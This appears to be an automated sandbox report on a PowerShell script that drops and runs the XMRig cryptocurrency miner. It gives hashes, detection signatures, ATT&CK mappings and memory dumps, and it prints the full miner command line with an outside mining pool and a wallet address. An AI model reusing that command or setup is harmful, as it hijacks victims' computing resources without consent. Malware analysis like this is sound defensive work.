Resubmissions

27-05-2024 18:28

240527-w4c4xsdc7w 10

27-05-2024 18:28

240527-w4c4xsdc7v 10

27-05-2024 18:28

240527-w4cs6aed49 10

27-05-2024 18:28

240527-w4cs6aed48 10

27-05-2024 18:28

240527-w4cs6aed47 10

27-05-2024 18:28

240527-w4c4xsed52

Analysis

  • max time kernel
    1799s
  • max time network
    1786s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-05-2024 01:30

General

  • Target

    file01 - copia (9).ps1

  • Size

    510B

  • MD5

    2dcb4d51653aec1a829f3232d69f5e12

  • SHA1

    dd096e7d800b9f3ca0edc64955b4464d71789f80

  • SHA256

    d1902d3e519d0d87097fd8969280bd01bd139a5191faadaed0149e61b4a7495c

  • SHA512

    7def3731bbb3f7ac3895edcf14c645bbcc0608f09c6b03bf7ddaebf049f1f6f1aad4086548ab9fce7b2bbefd837de8377f8b81cf94022d84e35f1bba0af89143

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 64 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      "C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1868

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0c1iz1px.c4f.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
    Filesize

    9.1MB

    MD5

    205ad9eb6acd6f58752899669b69fe74

    SHA1

    bedb78ac5034259b86c2cbc915de2e861e8d7604

    SHA256

    2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda

    SHA512

    28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

  • memory/1868-78-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-106-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-50-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-116-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-115-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-114-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-113-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-112-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-111-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-110-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-109-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-51-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-53-0x0000025CF2FA0000-0x0000025CF2FC0000-memory.dmp
    Filesize

    128KB

  • memory/1868-54-0x0000025CF31D0000-0x0000025CF31F0000-memory.dmp
    Filesize

    128KB

  • memory/1868-52-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-55-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-56-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-59-0x0000025CF31D0000-0x0000025CF31F0000-memory.dmp
    Filesize

    128KB

  • memory/1868-58-0x0000025CF2FA0000-0x0000025CF2FC0000-memory.dmp
    Filesize

    128KB

  • memory/1868-57-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-60-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-61-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-62-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-63-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-64-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-65-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-66-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-67-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-68-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-46-0x0000025C5EBF0000-0x0000025C5EC10000-memory.dmp
    Filesize

    128KB

  • memory/1868-70-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-71-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-72-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-73-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-80-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-75-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-76-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-77-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-69-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-47-0x0000025CF2B50000-0x0000025CF2B70000-memory.dmp
    Filesize

    128KB

  • memory/1868-74-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-81-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-82-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-83-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-84-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-85-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-86-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-87-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-88-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-89-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-90-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-91-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-92-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-93-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-94-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-95-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-96-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-97-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-98-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-99-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-100-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-101-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-102-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-103-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-104-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-105-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-79-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-107-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/1868-108-0x00007FF770DE0000-0x00007FF771A13000-memory.dmp
    Filesize

    12.2MB

  • memory/4764-48-0x00007FFF10393000-0x00007FFF10395000-memory.dmp
    Filesize

    8KB

  • memory/4764-15-0x000002A36A1A0000-0x000002A36A1AA000-memory.dmp
    Filesize

    40KB

  • memory/4764-14-0x000002A36A1C0000-0x000002A36A1D2000-memory.dmp
    Filesize

    72KB

  • memory/4764-12-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-11-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-10-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp
    Filesize

    10.8MB

  • memory/4764-9-0x000002A369FE0000-0x000002A36A002000-memory.dmp
    Filesize

    136KB

  • memory/4764-0-0x00007FFF10393000-0x00007FFF10395000-memory.dmp
    Filesize

    8KB

  • memory/4764-49-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp
    Filesize

    10.8MB